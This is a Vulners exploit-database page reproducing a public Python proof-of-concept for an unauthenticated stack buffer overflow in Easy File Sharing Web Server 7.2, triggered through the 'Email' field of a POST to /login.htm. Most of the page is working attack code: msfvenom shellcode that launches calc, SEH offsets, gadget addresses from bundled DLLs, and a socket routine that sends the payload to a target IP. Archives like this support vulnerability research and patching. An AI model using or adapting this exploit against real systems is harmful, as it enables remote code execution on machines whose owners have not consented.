Vulners
Lucene search
Easy File Sharing Web Server 7.2 Buffer Overflow
`#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server v7.2 - POST 'Email' Unauthenticated Remote Buffer Overflow
# Exploit Author: boku (aka Bobby Cooke)
# Date: February 7th, 2020
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested On: Microsoft Windows 10 Home - 10.0.18363 Build 18263 - x64-based PC
# Microsoft Windows 10 Home - 10.0.18363 Build 18363 - x86-based PC
# Microsoft Windows 10 Pro - 10.0.18363 Build 18363 - x86-based PC
# Microsoft Windows 10 Edu - 10.0.18363 Build 18363 - x86-based PC
# About: Easy File Sharing Web Server v7.2 suffers from a stack buffer overflow. This overflow can be triggered from an unauthenticated,
# remote user via a malformed HTTP POST request. The application fails to properly handle the 'Email' parameter when sending a malformed
# POST request to /login.htm. This POST request is triggered from the /register.ghp page, when completing the registration form to create
# an account. The application has front-end javascript code that attempts to mitigate this, but the js is easily bypassed by sending to the
# socket directly.
# Recreate:
# 1) Download & install Easy File Sharing Web Server v7.2
# 2) Open the Application, the HTTP server should begin running on ports 80 & 443
# 3) Change the 'host' variable below to the IP to the target devices IP
# 4) Run this python script
# 5) The program will crash and calculator will open
import socket
host = "192.168.70.134"
port = 80
nops = '\x90'*200
# Bad char = \x00,\x3b
# Expanding the buffer past 4028 bytes causes SEH to trigger
# root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x3b' -f python -v shellcode
# Payload size: 216 bytes
shellcode = b""
shellcode += b"\xda\xcf\xbe\x33\x02\x8e\x27\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x30\x31\x72\x18\x83\xc2\x04"
shellcode += b"\x03\x72\x27\xe0\x7b\xdb\xaf\x66\x83\x24\x2f"
shellcode += b"\x07\x0d\xc1\x1e\x07\x69\x81\x30\xb7\xf9\xc7"
shellcode += b"\xbc\x3c\xaf\xf3\x37\x30\x78\xf3\xf0\xff\x5e"
shellcode += b"\x3a\x01\x53\xa2\x5d\x81\xae\xf7\xbd\xb8\x60"
shellcode += b"\x0a\xbf\xfd\x9d\xe7\xed\x56\xe9\x5a\x02\xd3"
shellcode += b"\xa7\x66\xa9\xaf\x26\xef\x4e\x67\x48\xde\xc0"
shellcode += b"\xfc\x13\xc0\xe3\xd1\x2f\x49\xfc\x36\x15\x03"
shellcode += b"\x77\x8c\xe1\x92\x51\xdd\x0a\x38\x9c\xd2\xf8"
shellcode += b"\x40\xd8\xd4\xe2\x36\x10\x27\x9e\x40\xe7\x5a"
shellcode += b"\x44\xc4\xfc\xfc\x0f\x7e\xd9\xfd\xdc\x19\xaa"
shellcode += b"\xf1\xa9\x6e\xf4\x15\x2f\xa2\x8e\x21\xa4\x45"
shellcode += b"\x41\xa0\xfe\x61\x45\xe9\xa5\x08\xdc\x57\x0b"
shellcode += b"\x34\x3e\x38\xf4\x90\x34\xd4\xe1\xa8\x16\xb2"
shellcode += b"\xf4\x3f\x2d\xf0\xf7\x3f\x2e\xa4\x9f\x0e\xa5"
shellcode += b"\x2b\xe7\x8e\x6c\x08\x17\xc5\x2d\x38\xb0\x80"
shellcode += b"\xa7\x79\xdd\x32\x12\xbd\xd8\xb0\x97\x3d\x1f"
shellcode += b"\xa8\xdd\x38\x5b\x6e\x0d\x30\xf4\x1b\x31\xe7"
shellcode += b"\xf5\x09\x52\x66\x66\xd1\x95"
# + ECX & SEH offset @ 3996
offsetECX = '\xcc'*(3996-len(nops+shellcode))
CL = '\x42'
CH = '\x3f'
offsetEIP = '\x43'*8
high2bECX = '\x42\x42'
# EIP overwrite at offset 4008
# - EBX holds PTR to payload in Heap
# 043A7864 0271836C l.q. ASCII "newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email=Aa0Aa1..
# - Beginning of Payload at [EBX+-x3f] // (0x3f=63b)
ret1 = '\x19\x1e\x01\x10' # 0x10011E19[ImageLoad.dll] # add byte ptr ds:[ebx], ch # ret
# - After EIP overwrite ret, ESP is at +16 bytes
offsetRet2 = '\x42'*12
ret2 = '\x5b\x02\xc4\x61' # 0x61c4025b[sqlite3.dll] # jmp [ebx]
payload = nops+shellcode+offsetECX+CL+CH+high2bECX+offsetEIP+ret1+offsetRet2+ret2
httpRequest = "POST /login.htm HTTP/1.1\r\n"
httpRequest += "Host: "+host+"\r\n"
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
httpRequest += "Accept-Language: en-US,en;q=0.5\r\n"
httpRequest += "Accept-Encoding: gzip, deflate\r\n"
httpRequest += "Referer: http://"+host+"/register.ghp\r\n"
httpRequest += "Content-Type: application/x-www-form-urlencoded\r\n"
httpRequest += "Connection: close\r\n"
httpRequest += "Cookie: SESSIONID=16065; UserID=; PassWD=; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201\r\n"
httpRequest += "Upgrade-Insecure-Requests: 1\r\n"
httpRequest += "frmLogin=true&frmUserID=newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email="+payload+"&Avatar=&avatarURL=®ister=Register%21\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect((host, port))
print("[+] Successfully connected to "+host)
s.send(httpRequest)
print("[+] Payload Sent")
except:
print("Failure to launch")
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Feb 2020 00:00Current
0.3Low risk
Vulners AI Score0.3